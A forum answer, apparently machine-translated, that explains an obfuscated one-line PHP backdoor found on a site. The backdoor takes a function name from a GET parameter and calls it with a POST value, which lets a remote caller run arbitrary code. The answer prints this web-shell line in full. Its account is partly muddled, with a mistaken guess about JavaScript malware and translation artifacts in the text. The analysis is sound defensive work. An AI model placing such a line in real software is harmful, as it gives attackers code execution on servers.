Break it down a bit:
( $_=@ $_GET[page]) . @$_($_POST[404]); Firstly, these are two expressions concatenated with a period: () . () .
In the first expression, $_ = $_GET[page] , $_ is a variable and is assigned = variable $_GET['page'] , or perhaps the output of the anonymous function that it refers to. If $_GET[page] refers to an anonymous function, @ will suppress any errors from it.
Second expression @ $_( $_POST[404] ); starts by suppressing the errors @ anonymous function $_ , which you can say now, it is an anonymous function called because it is on ( . The argument passed to this function is $_POST['404'] , and then the second bracket simply closes the call .
So, I think your suspicions are true; it looks like obfuscated code designed to look for a harmless or part of a site. I suspect that the values ββfor $_GET[page] and $_POST[404] are possibly javascript strings whose echo on the page will install malware or adware.
You can debug this by looking at the values ββof these two variables and seeing what they are.
As far as I can tell, without knowing the values ββin GET and POST, it looks like the $_GET[page] string is assigned to the variable $_ , which will be what someone sends to the URL when the page loads. Thus, they can pass the string name of any function to the site and have it in the PHP field.
Then they run this arbitrary function by the value of $_POST['404'] . This value is also displayed on the browser or POST user page.
Concatenation and the outer bracket ().() May just be more confusing, or the point of this code may simply be to repeat the results of this code on the page (for example, for javascript input). But it is also possible that they call any function that they want, for any argument they pass. I canβt say just by looking, but someone more familiar with PHP might have.
user151841
source share